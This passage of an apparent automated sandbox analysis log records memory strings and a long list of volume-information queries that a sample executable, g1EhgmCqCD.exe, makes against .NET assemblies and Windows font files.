          Source: explorer.exe, 00000004.00000000.675793329.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 00000009.00000002.911521958.0000000003250000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.675793329.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 00000009.00000002.911521958.0000000003250000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.675793329.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 00000009.00000002.911521958.0000000003250000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.693874904.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Users\user\Desktop\g1EhgmCqCD.exe VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
